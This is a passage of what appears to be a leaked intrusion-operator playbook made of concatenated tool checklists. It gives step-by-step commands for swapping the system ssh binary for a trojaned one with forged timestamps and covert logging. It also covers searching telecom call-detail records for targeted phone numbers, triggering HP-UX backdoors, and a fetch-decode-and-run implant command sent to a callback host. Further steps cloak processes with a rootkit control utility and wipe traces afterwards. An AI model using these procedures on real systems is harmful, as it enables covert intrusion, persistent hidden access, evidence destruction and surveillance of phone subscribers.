-rm lvmkd nfskd
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
##### Either -burn off or if the target is HPUX, use -exit and let -wearcup do t
he cleanup
###
### END File user.tool.cursehydrant.COMMON
### (see also ../etc/user.tool.cursehydrant.COMMON)
###
### BEGIN File user.tool.dubmoat.COMMON (see also ../etc/user.tool.dubmoat.COM
MON)
###
##########################################
# DUBMOAT
##########################################
### Verify version on target:
uname -a
which ssh
ssh -V
### Preserve timestamps:
-ls -i /usr/bin/ssh
-ls -d /usr/bin
touch -r /usr/bin/ssh /tmp/.st
touch -r /usr/bin /tmp/.sb
-lt
### Create location (utmp~) for dubmoat logging:
-ls -t /var/run
cp /var/run/utmp /var/run/utmp~
### fix permisssions so any user can write to the file:
chmod 666 /var/run/utmp~
### Download original ssh:
-get /usr/bin/ssh
### Upload dubmoat and check the version:
-put /current/up/Ssh ssh
./ssh -V
### Cat our version over original to preserve inode:
cat /tmp/ssh > /usr/bin/ssh
-ls -i /usr/bin/ssh
/usr/bin/ssh -V
file /usr/bin/ssh
### Fix timestamps:
touch -r /var/run/utmp /var/run/utmp~
touch -r /var/run/utmp /var/run
touch -r /tmp/.st /usr/bin/ssh
touch -r /tmp/.sb /usr/bin
-ls -i /usr/bin/ssh
-ls -d /usr/bin/.
### Cleanup:
-rm .st .sb ssh
############################
# DUBMOAT COLLECTION
############################
-ls /var/adm/utmp*
-get -l /var/adm/utmp~
### Upload the tool used to truncate the dubmoat collection file
### Using the first "FILE SIZE" field from the output above,
### truncate the most recent collection out of the file
-lt /var/adm/utmp~
./dmt /var/adm/utmp~ <FILESIZE>
-lt /var/adm/utmp~
-rm dmt
###
### END File user.tool.dubmoat.COMMON
### (see also ../etc/user.tool.dubmoat.COMMON)
###
### BEGIN File user.tool.cursehappy.COMMON (see also ../etc/user.tool.cursehap
py.COMMON)
###
################ CURSEHAPPY #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss
, wb
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
# isbapro1 10.5.7.51
# nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -
10
-lt /u03/archive/collect
# newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
# old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
### If none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
########################## CURSEHAPPY #########################################
###############
################################################################################
###############
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
file argfile*.enc
### to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
### encrypt the def files
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl
-i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -l
file /current/up/cursedefs/*.enc
### encrypt the def files
############ argfile 2
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile2.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.200
6071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2
-beep 15
############ argfile 3
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile3.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.200
6071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3
-beep 15
#############
############# for loglevel testing (local file should be ascii?)
#############
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -w e -loglevel 2 -d /CHAN
GEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.tes
t
-beep 15
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -
o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -
o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
-rm crond adm adm~
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.cursehappy.COMMON
### (see also ../etc/user.tool.cursehappy.COMMON)
###
### BEGIN File user.tool.orleansstride.COMMON (see also ../etc/user.tool.orlea
nsstride.COMMON)
###
################ ORLEANSSTRIDE #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.orleansstride.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### For ORLEANSSTRIDE, the numbers must be in sorted order...the following loop
### will put all of the files in sorted order
cd /current/down/argfiles
for i in argfile*.txt; do sort -u -o `basename $i .txt`.sorted; done
##### Upload the encrypted phone list as awk, modify each parser command to have the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (e.g. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM THE MOST RECENT TIME (PROBABLY THE CURRENT DATE) AS FAR BACK AS TIME ALLOWS
############ argfile 1
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print"
-P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print"
-P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-put /current/down/argfiles/argfile3.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print"
-P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile3.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3.more
-beep 15
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with it:
### to limit amount of memory used, replace "-x" with "-X numberBytes"
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
x
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit amount of memory used, replace "-y" with "-Y numberBytes"
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
y
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc
1 -o cdrhits.orleansstride.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc
2 -o cdrhits.orleansstride.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
#####
##### clean up
#####
-rm nscd awk
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.orleansstride.COMMON
### (see also ../etc/user.tool.orleansstride.COMMON)
###
### BEGIN File user.tool.skimcountry.COMMON (see also ../etc/user.tool.skimcountry.COMMON)
###
################ SKIMCOUNTRY #########################
############### PARSING #######################################################
############
### Now, encrypt the ascii list locally... first make sure you have the encryption tool:
cd /current/down/argfiles
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
file argfile*.enc
### to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (e.g. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM THE MOST RECENT TIME (PROBABLY THE CURRENT DATE) AS FAR BACK AS TIME ALLOWS
### benchmarking:
# phonelist had 44 numbers
# 3 day pull took 38 minutes over ALL directories
# 1 day average pull took 10-13 minutes
### file name extensions:
# GCDR = Nor
# usd = Sie
######## Upload the parser (SKIMCOUNTRY) and call it crond
# put up the parser tool
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl crond
# or
-put /mnt/zip*/skimcountry.v1.2.SunOS5.9.targetdl crond
##### Upload the encrypted phone list as adm, then run the parser:
############ argfile 1
-put /current/down/argfiles/argfile1.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2
-beep 15
-put /current/down/argfiles/argfile2.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2.more
-beep 15
######
###### to parse other vendor files:
######
#./crond -k CRYPTKEY -P adm -z "ls -1rt /var/archive/output_billing/*/MSC*200606
29*usd*ama" > .mcftpl38755
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc1
-o cdrhits.skimcountry.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc2
-o cdrhits.skimcountry.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
######
DAIRYFARM procedures:
mx
:%s/TARGET_IP/TARGET_IP/g
:%s/WINDOWS_REDIR_IP/WINDOWS_REDIR_IP/g
:%s/LINUX_OP_BOX_IP/192.168.254.71/g
:%s/WINDOWS_OP_BOX_IP/192.168.254.72/g
:%s/CONTROL_PORT/CONTROL_PORT/g
:%s/XSERVER_PORT/XSERVER_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/NOPEN_PORT/NOPEN_PORT/g
:%s/RAT_NAME/sendmail/g
:%s,TMP_DIR,/tmp/.scsi,g
`x
### Follow steps in this order:
###
### END File user.tool.dairyfarm.COMMON
### (see also ../etc/user.tool.dairyfarm.COMMON)
###
### BEGIN File user.tool.trigger_hpux_jl_in.COMMON (see also ../etc/user.tool.trigger_hpux_jl_in.COMMON)
###
###############################################################
# TRIGGERING HPUX INCISION via JACKLADDER and JACKLADDERHELPER
###############################################################
### BACKGROUND:
### HP-INCISION provides process and file hiding. It does NOT provide
### connection hiding nor does it have a triggering capability in this
### version (1.1.2.1 for HPUX11.00)
### HP-JACKLADDER differs from other JACKLADDERs because it requires the use
### of special source ports for triggering. The purpose of the special source
### ports is two-fold: it plays a part in the authentication process for the
### trigger, and it causes the 'accept' call to wait an extra 5 seconds for
### input, thus allowing it to work via most redirection (as long as the
### roundtrip time between the redirector and the target is less than 5
### seconds.)
### JACKLADDERHELPER is an "instant-grat" version listening on an extra port.
### It only listens until the target reboots.
### On HPUX, it is typically installed on port 7162 running as 'memlogd'.
### JACKLADDER will take over once the target reboots. Depending on how it
### was installed, it will listen on ports started by inetd (check
### /etc/inetd.conf) or on the sendmail port.
### The HP-JACKLADDER and HP-JACKLADDERHELPER special source ports are:
### 3, 51, 8213, 12634, 16798, 23247
HP-TARGET-IP self-explanatory
HP-JL-SOURCE-PORT 3, 51, 8213, 12634, 16798, or 23247
JL-LISTEN-PORT before target reboots - double-check, but probably 7162; after target reboots - double-check, but probably try (13, 21, 23, 37, 113)
NETCAT-PORT random for uploading nopen
LINUX-OP-BOX local Linux machine (probably 192.168.254.71)
WIN-OP-BOX local Windows machine (probably 192.168.254.72)
UNIX-REDIR-IP IP that target will call back to
WIN-REDIR-IP IP that target will call back to
NOPEN_DIR directory to upload nopen to (/tmp/.scsi usually)
(WILL NEED TO ESCAPE SLASHES)
NOPEN_NAME name of nopen on target
NOPEN_PORT port to run nopen on
mx
:%s/HP_TARGET_IP/HP_TARGET_IP/g
:%s/HP_JL_SOURCE_PORT/HP_JL_SOURCE_PORT/g
:%s/JL_LISTEN_PORT/JL_LISTEN_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/LINUX_OP_BOX/LINUX_OP_BOX/g
:%s/WIN_OP_BOX/WIN_OP_BOX/g
:%s/UNIX_REDIR_IP/UNIX_REDIR_IP/g
:%s/WIN_REDIR_IP/WIN_REDIR_IP/g
:%s/NOPEN_DIR/NOPEN_DIR/g
:%s/NOPEN_NAME/NOPEN_NAME/g
:%s/NOPEN_PORT/NOPEN_PORT/g
'x
#########################################################
### TO CONNECT TO JACKLADDER* thru solaris box:
#########################################################
### Verify the JACKLADDERHELPER port is still listening
### If the port doesn't respond, the target may have rebooted or JACKLADDER_HELPER died
### "Connection refused" means that the port isn't listening
### Otherwise scan for ports that should be started by inetd
### jackladderhelper port is probably 7162
-scan JL_LISTEN_PORT TARGET_IP
### On Solaris redirector:
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
Your Choice[1] 1
UTC offset? [0]
Which port will we be uploading nopen on? [44841] NETCAT_PORT
Which port would you like nopen to listen on? [48970] NOPEN_PORT
Nopen to upload[] CORRECT_NOSERVER_FROM_MORERATS
Which directory would you like to create[/tmp/.dskman] NOPEN_DIR
What would you like nopen called on target [podd] NOPEN_NAME
Do you want incision to bless the nopen server? [Yn] Y
Continue? [Yn] Y
### after the upload completes:
### close both jackpop windows,
### type DONE in -jackpop window
### connect using the -nstun command given by the -jackpop window
############ GO TO WEARCUP SECTION NOW IF SUCCESSFUL #########
######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed on target!:
### Test JL from redirector:
### special source ports: 3, 51, 8213, 12634, 16798, 23247
### Probably need to redirect output (2>&0 1>&0 as below) for every
### command run
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
3
0
Y
date 2>&0 1>&0
DONE
##############################################################
### TO CONNECT TO HP-UX JACKLADDER* thru non-Solaris Unix box:
##############################################################
### Window 1 on Unix redirector:
-tunnel
l JL_LISTEN_PORT HP_TARGET_IP JL_LISTEN_PORT HP_JL_SOURCE_PORT
r NETCAT_PORT
### Window 2 on Unix redirector:
# If nopen calling back:
-nrtun NOPEN_PORT
# If calling into nopen, don't run this until you run window 4 cmd
# and nopen appears to be successfully uploaded
-nstun HP_TARGET_IP:NOPEN_PORT
### Window 3 local
packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT
### Window 4 local and scripted
# If calling forward into nopen:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UN
IX_REDIR_IP NETCAT_PORT </dev/console >NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; u
ncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN
_PORT; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc 127.0.0.1 JL
_LISTEN_PORT
# If nopen is calling back:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UN
IX_REDIR_IP NETCAT_PORT </dev/console >NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; u
ncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-cUNIX_
REDIR_IP:NOPEN_PORT; export S=30; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_P
ORT HIDEME= nc 127.0.0.1 JL_LISTEN_PORT
### TROUBLESHOOTING: CMD can be changed to be any string of shell commands.
### If output from any command in the string desired, you may have to append
### the string "2>&0 1>&0" to each command
### i.e. "ls -la /tmp 2>&0 1>&0; uname -a 2>&0 1>&0"
###
### NOTE: you cannot remove or overwrite a running binary on HP-UX, so if
### you are trying to overwrite something during troubleshooting, this may
### be why
#########################################################
### TO CONNECT TO JACKLADDER* thru windows box:
#########################################################
### from windows target, scan JACKLADDERHELPER to see if it's still listening:
banner -ip HP_TARGET_IP -port JL_LISTEN_PORT
### windows tunnels:
### ----------------
# Examples to connect, connect back to packrat window to upload nopen, and -nstun to target:
### connect to JACKLADDER*
### background redirect -tcp -lplisten JL-LISTEN-PORT -target HP-TARGET-IP JL-LI
STEN-PORT HP-JL-SOURCE-PORT -bind WIN-OP-BOX
### background redirect -tcp -lplisten 7162 -target 10.27.50.41 7162 12634 -bind
192.168.254.72
background redirect -tcp -lplisten JL_LISTEN_PORT -target HP_TARGET_IP JL_LISTEN
_PORT HP_JL_SOURCE_PORT -bind WIN_OP_BOX
#########################################################
# Running WEARCUP and NOT using -burn
#########################################################
### Once connected, you will be in your temporary directory and will need
### to clean it up. However, HPUX systems will not allow you to delete an
### executable if it's running, nor the directory it's running in. To
### circumvent this, use 'cup' (CleanUp)
-lt
-rm nscd.uu
-gs wearcup -h
# change the options for what you want to call cup and how long you want cup
# to sleep before it kills nopen and cleans your working directory,
# then run it
-gs wearcup -r snmpd -w 4h
# when it is time to end the op, kill the "sleep" pid to start immediate cleanup
# to extend the op, kill the pid of the script (now called snmpd), then kill the sleep
# DO NOT -burnBURN !!!!!!
# use -exit for your windows!!!!!
#########################################################
### HP-INCISION technique checks
#########################################################
############################################################################
##### INSTALLATION #####
############################################################################
## First, make sure no other implants are installed, i.e. the family
# If Solaris
-strings /platform
###################################################
### Trigger Dewdrop and verify SS is working ######
###################################################
### Below are commands to trigger DD without upload/execute, there
### will be no Nopen session, will have a prompt in the "ish" shell
### Possibility exists will have to play with options to ourtn/-irtun
### to trigger on certain ports, etc.
### Try THIS first (if redirecting from Nopen)
-irtun TARGET_IP CALLBACK_PORT -Y5
### or (if going direct)
ourtn -Y5 -p CALLBACK_PORT TARGET_IP
### for Dewdrop-3.X
tipoff-3.X --trigger-address TARGET_IP --target-address TARGET_IP --target-proto
col <tcp/udp> --target-port TARGET_PORT --callback-address CALLBACK_IP --callbac
k-port CALLBACK_PORT --start-ish
### look for output from "pwd" run after target calls back, the resulting
### directory is the SS hidden directory
## In Dewdrop window get the pid of DD connection to ish shell
echo $$
## set DD PID in the rest of the script
mx
:%s/DEWDROP_PID/DEWDROP_PID/g
`x
## In un-elevated Nopen window, verify Dewdrop connection and processes are cloaked
ps -ef | grep DEWDROP_PID
netstat -an | grep CALLBACK_PORT
## the hidden directory will be somewhere on the root filesystem,
## you can now do a directory listing of the hidden directory's parent
## in the un-elevated Nopen window to determine that it is indeed hidden
## (i.e. do "-ls /var/tmp" if hidden dir is "/var/tmp/.0123456789abcdef")
##
## REMINDER: DO NOT EXPLICITLY NAME HIDDEN FILES/DIRS FROM AN UNPRIVILEGED
## WINDOW (see top of script for more detailed explanation)
-ls /var/tmp
-ls /lib
-ls /dev
-ls /etc
-ls /
## Report any cloaking failures via notes or "-problem"
#######################################################################
##### IF NO PROBLEMS ENCOUNTERED, INSTALLATION COMPLETE #####
#######################################################################
#######################################################################
##### Ctrl Usage and Troubleshooting Instructions #####
#######################################################################
### Should have at least two Nopen windows: one to become privileged,
### other to stay unprivileged, for comparing outputs of commands
## get the PID of the Nopen window that will become privileged
-pid
## set Nopen PID in the rest of the script
mx
:%s/PRIVILEGED_NOPEN_PID/PRIVILEGED_NOPEN_PID/g
`x
########################################################
## Ctrl Usage Options:
# -C [pid | /file/path] Cloak the given process or file path
# -c [pid | /file/path] Uncloak the given process or file path
# -d Display default cloaked directory
# -E pid Enable the given process's ability to see otherwise
# cloaked processes and files.
# -e pid Disable the given process's ability to see
# otherwise cloaked processes and files.
# -F pid Enable the given process's ability to see otherwise
# cloaked files ONLY.
# -f pid Disable the given process's ability to see
# otherwise cloaked files ONLY.
# -P pid Enable the given process's ability to see otherwise cloaked
# processes ONLY.
# -p pid Disable the given process's ability to see otherwise cloaked
# processes ONLY.
# -K pid Designate a process as to be killed upon shutdown
# -k pid Designate a process as to NOT be killed upon shutdown
# -r /bin/sh Execute the given program as the root user
# -T signal Send the specified signal to all killable cloaked processes.
# -U Invoke a full uninstall (self destruct)
# -u Invoke a partial uninstall (unpatch and unload)
# -s path Set the times associated with a given file path
# -g path Get the times associated with a given file path
########################################################
## upload SS Control Utility using nopen
-put /current/up/Ctrl c
## or ftshell
~~p /current/up/Ctrl c
### If Nopen already a privileged process (i.e. started by a child of DD,
### etc.), do not need to set SEED variable to use Ctrl, otherwise SEED
### must be set
## SEED calculation algorithm. WARNING do this off target!!!
seedcalc TARGET_HOSTNAME
## if you don't have 'seedcalc'
echo -n TARGET_HOSTNAME | rev | tr -d '\n' | md5sum | cut -f1 -d' '
## if you don't have 'rev'
echo -n TARGET_HOSTNAME | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' |
tr -d '\n' | md5sum | cut -f1 -d' '
## set value of SEED in the rest of the script
mx
:%s/CALCULATED_SEED/CALCULATED_SEED/g
`x
## REMINDER: DO NOT USE THIS OUTPUT EXPLICITLY IN AN UNPRIVILEGED PROCESS WHEN
## ACCESSING FILESYSTEM, SEE WARNING AT THE TOP OF THE SCRIPT
## WARNING: WHEN CLOAKING PROCESSES, MUST MAKE SURE THAT NO CLOAKED PROCESS IS
## IS THE PARENT OF AN UNCLOAKED PROCESS. IF NECESSARY TO HAVE A
## PROCESS UNCLOAKED, MUST UNCLOAK PARENTS ALL THE WAY TO INIT (i.e. if
## need an uncloaked Nopen, Nopen listener must be uncloaked as well)
## Use Ctrl to determine the name of the Cloaked directory
SEED=CALCULATED_SEED PATH=. c -d
## Use Ctrl to enable Nopen to see cloaked processes, connections and files.
SEED=CALCULATED_SEED PATH=. c -E PRIVILEGED_NOPEN_PID
## Use Ctrl to cloak the Nopen process, connections.
SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID
## Optional - Designate Nopen to NOT be killed should the implant be
## shutdown (self-destruct). You won't get any notification that this happened.
SEED=CALCULATED_SEED PATH=. c -k PRIVILEGED_NOPEN_PID
## Or, can do the above three actions in one command line
SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID -E PRIVILEGED_NOPEN_PID -k
PRIVILEGED_NOPEN_PID
## can replace PRIVILEGED_NOPEN_PID with the PID of any process you'd like to hide
## Find your nopen connections -- consider narrowing the search, as you probably
## already know your connection ip and port
netstat -an | grep REDIRECTOR_IP
## set Nopen Port in the rest of the script
mx
:%s/NOPEN_PORT/NOPEN_PORT/g
`x
## Find nopen using the privileged process. Verifies you can find Nopen in
## ps and netstat listings when privileged
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an |grep NOPEN_PORT
## in an unprivileged window, these should be unsuccessful if Nopen was cloaked
## in an earlier Ctrl command
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an | grep NOPEN_PORT
## You should now be able to see the cloaked directory
## The cloaked directory MAY be in one of the following. Refer to what
## the `pwd` from Dewdrop returned
-lt /var/tmp
-lt /lib
-lt /dev
-lt /etc
-lt /
### APPENDIX
## DATE Errors
##
## 1 LOADER_ERROR_UNKNOWN
## The requested action failed for an unknown reason.
## 2 LOADER_ERROR_MEMORY
## There was a problem allocating memory.
## 3 LOADER_ERROR_READ_FILE
## There was a problem reading file data.
## 4 LOADER_ERROR_EXTRACT_PAYLOAD
## Could not extract payload data.
## 5 LOADER_ERROR_INVALID_PAYLOAD
## Payload data is invalid.
## 6 LOADER_ERROR_MERGE_ARCHIVE
## Could not merge old archive with new during an upgrade.
## 7 LOADER_ERROR_GENERATE_PAYLOAD
## Could not generate new payload data during an upgrade.
## 8 LOADER_ERROR_BUFFER_TOO_SMALL
## The given buffer is too small to hold the requested data.
## 9 LOADER_ERROR_LIST_BUFFER_TOO_SMALL
## The given array is too small to hold all the requested data elements.
## 10 LOADER_ERROR_SYSINFO
## Could not determine the host system information.
## 11 LOADER_ERROR_ENUMERATE_PLATFORM_TAGS
## Could not enumerate platform types.
## 12 LOADER_ERROR_ENUMERATE_OBJECTS
